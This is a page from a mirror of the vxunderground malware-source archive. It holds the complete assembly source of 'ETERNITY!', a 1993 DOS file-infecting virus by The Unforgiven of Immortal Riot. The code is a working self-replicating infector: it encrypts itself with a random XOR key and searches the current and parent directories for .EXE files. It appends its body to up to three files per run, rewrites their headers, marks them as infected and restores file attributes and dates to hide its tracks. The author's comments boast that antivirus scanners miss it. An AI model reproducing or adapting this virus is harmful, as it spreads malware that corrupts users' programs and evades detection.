mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
251 lines
5.8 KiB
NASM
251 lines
5.8 KiB
NASM
; VirusName : ETERNITY!
|
|
; Origin : Sweden
|
|
; Author : The Unforgiven
|
|
; Date : 15/12/93
|
|
|
|
; This is a "mutation", of Tormentor's .EXE lession. It's HIGHLY
|
|
; modified, and I'd nearly dare to call it a "new" virus. But well,
|
|
; the infection routine are the same, so I really dunno.
|
|
|
|
; Anyway, it's a non-overwriting randomly self encrypted infector
|
|
; of .EXE programs. It'll infect up to 3 programs each run, and now
|
|
; it also contain a dot-dot routine for moving directories. This
|
|
; version have also fixed up the "file attributes", so It will
|
|
; first clean, then infect, then restore them. It'll after infections
|
|
; in other the current directory, also return to it's original dir.
|
|
|
|
; Since its complex cryptation routine no scanners will find it.
|
|
; Scan/MSAV/TBAV/FindViru and F-prot can't find shits. TBAVs most
|
|
; advanced heurtistic scanner will ONLY!, report that the infected
|
|
; programs got a flexible entry point, ie nothing really! Haha!,
|
|
; he can suck his dick blue, 9 out of 10 "new" viruses, blah!!!
|
|
|
|
; This virus don't have ANY destructive routine at all!, Yes, it's
|
|
; true! I hope this one will survive into ETERNITY!..Greetings,
|
|
; must go out to Raver, and Tormentor/DY. Hope you enjoy this code!
|
|
|
|
;=============================================================================
|
|
; **** ETERNITY! ****
|
|
;=============================================================================
|
|
|
|
.model tiny
|
|
.radix 16
|
|
.code
|
|
|
|
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
|
|
org 100
|
|
|
|
Virus_Start: call where_we_are
|
|
|
|
where_we_are: pop bp
|
|
sub bp,where_we_are-Virus_Start
|
|
|
|
call encrypt_decrypt
|
|
jmp encryption_start
|
|
write_virus:
|
|
call encrypt_decrypt
|
|
mov ah,40 ; Write virus to EOF.
|
|
mov cx,Virus_Lenght
|
|
mov dx,bp
|
|
int 21
|
|
call encrypt_decrypt
|
|
ret
|
|
|
|
encryption_value dw 0
|
|
encrypt_decrypt:
|
|
lea si,cs:[bp+encryption_start-virus_start]
|
|
mov cx,(end_of_virus-encryption_start+1)/2
|
|
mov dx,word ptr cs:[bp+encryption_value-virus_start]
|
|
|
|
again:
|
|
xor word ptr cs:[si],dx
|
|
add si,2
|
|
loop again
|
|
ret
|
|
|
|
|
|
encryption_start:
|
|
|
|
mov ax,es
|
|
add ax,10
|
|
add ax,cs:[bp+Exe_header-Virus_Start+16]
|
|
push ax
|
|
push cs:[bp+Exe_header-Virus_Start+14]
|
|
|
|
push ds
|
|
push cs
|
|
pop ds
|
|
|
|
mov ah,1a ;SET-DTA
|
|
lea dx,[bp+Own_dta-virus_start] ;till own_dta
|
|
int 21
|
|
|
|
;Get starting dir
|
|
mov ah,47
|
|
xor dl,dl
|
|
lea si,[bp+dir-virus_start]
|
|
int 21
|
|
|
|
|
|
;start finding files
|
|
xor di,di ;infection count
|
|
|
|
mov ah,4e ; We start to look for a *.EXE file
|
|
look4victim: ;mov dx,offset file_match-Virus_Start
|
|
;add dx,bp
|
|
lea dx,[bp+file_match-virus_start]
|
|
int 21
|
|
|
|
jnc clear_attribs
|
|
|
|
lea dx,[bp+dot_dot-virus_start]
|
|
mov ah,3bh
|
|
int 21h
|
|
jnc not_root
|
|
jmp no_victim_found
|
|
not_root:
|
|
mov ah,4e
|
|
jmp look4victim
|
|
; jmp no_victim_found ; If no *.EXE files was found.
|
|
|
|
clear_attribs:
|
|
mov ax,4301h
|
|
xor cx,cx
|
|
lea dx,[bp+own_dta-virus_start+1eh]
|
|
int 21h
|
|
|
|
cont2: mov ax,3d02 ;open file
|
|
mov dx,Own_dta-Virus_Start+1e
|
|
add dx,bp
|
|
int 21
|
|
|
|
jnc cont1 ;exit if error
|
|
jmp cant_open_file
|
|
|
|
cont1: xchg ax,bx ;handle in bx
|
|
|
|
mov ah,3f ;read file - 28 bytes
|
|
mov cx,1c ;to EXE_header
|
|
lea dx,[bp+exe_header-virus_start]
|
|
int 21
|
|
|
|
jnc no_error ;exit if error
|
|
jmp read_error
|
|
no_error:
|
|
cmp byte ptr ds:[bp+Exe_header-Virus_Start],'M'
|
|
jnz no_exe ; !!! Some EXEs starts with ZM !!!
|
|
cmp word ptr ds:[bp+Exe_header-Virus_Start+12],'RI'
|
|
jz infected
|
|
|
|
mov ax,4202 ; Go EOF
|
|
xor cx,cx
|
|
xor dx,dx
|
|
int 21
|
|
|
|
push dx
|
|
push ax
|
|
|
|
mov ah,2ch ; this gets a random
|
|
int 21h ; encryption value..
|
|
mov word ptr cs:[bp+encryption_value-virus_start],dx
|
|
|
|
call write_virus
|
|
; mov ah,40 ; Write virus to EOF.
|
|
; mov cx,Virus_Lenght
|
|
; mov dx,bp
|
|
; int 21
|
|
|
|
mov ax,4202 ; Get NEW filelenght.
|
|
xor cx,cx
|
|
xor dx,dx
|
|
int 21
|
|
|
|
mov cx,200
|
|
div cx
|
|
inc ax
|
|
mov word ptr ds:[Exe_header-Virus_Start+2+bp],dx
|
|
mov word ptr ds:[Exe_header-Virus_Start+4+bp],ax
|
|
|
|
pop ax
|
|
pop dx
|
|
|
|
mov cx,10
|
|
div cx
|
|
sub ax,word ptr ds:[Exe_header-Virus_Start+8+bp]
|
|
mov word ptr ds:[Exe_header-Virus_Start+16+bp],ax
|
|
mov word ptr ds:[Exe_header-Virus_Start+14+bp],dx
|
|
|
|
mov word ptr ds:[Exe_header-Virus_Start+12+bp],'RI'
|
|
|
|
mov ax,4200 ; Position file-pointer to BOF
|
|
xor cx,cx
|
|
xor dx,dx
|
|
int 21
|
|
|
|
mov ah,40 ; Write header
|
|
mov cx,1c
|
|
; mov dx,offset Exe_header-Virus_Start
|
|
; add dx,bp
|
|
lea dx,[bp+exe_header-virus_start]
|
|
int 21
|
|
|
|
jc write_error
|
|
|
|
no_exe:
|
|
jmp close_it ;
|
|
infected:
|
|
dec di
|
|
close_it:
|
|
|
|
;restore date
|
|
lea si,[bp+own_dta-virus_start+16h]
|
|
mov cx,word ptr [si]
|
|
mov dx,word ptr [si+2]
|
|
mov ax,5701h
|
|
int 21h
|
|
|
|
mov ah,3e ;close file
|
|
int 21
|
|
|
|
|
|
; file attrib
|
|
mov ax,4301h
|
|
xor ch,ch
|
|
lea bx,[bp+own_dta-virus_start+15h]
|
|
mov cl,[bx]
|
|
lea dx,[bp+own_dta-virus_start+1eh]
|
|
int 21h
|
|
|
|
Sick_or_EXE: mov ah,4f ;find next in dir until all is found
|
|
inc di
|
|
cmp di,3
|
|
jae finnished_infection
|
|
jmp look4victim
|
|
|
|
write_error: ; Here you can test whats went wrong.
|
|
read_error: ; This is just for debugging purpose.
|
|
cant_open_file: ; These entries are equal to eachother
|
|
no_victim_found: ; but could be changed if you need to test something.
|
|
finnished_infection:
|
|
|
|
;restore dir
|
|
lea dx,[bp+dir-virus_start]
|
|
mov ah,03bh
|
|
int 21
|
|
|
|
quit:
|
|
pop ds
|
|
retf
|
|
|
|
note db "[ETERNITY!] (c) '93 The Unforgiven/Immortal Riot "
|
|
dot_dot db '..',0
|
|
file_match db '*.EXE',0 ; Files to infect.
|
|
Exe_header db 16 DUP(0)
|
|
dw 0fff0 ; Just for this com file.
|
|
db 4 DUP(0)
|
|
Own_Dta db 02bh DUP(0)
|
|
dir db 65 dup (?)
|
|
|
|
Virus_End EQU $
|
|
end_of_virus:
|
|
end Virus_Start |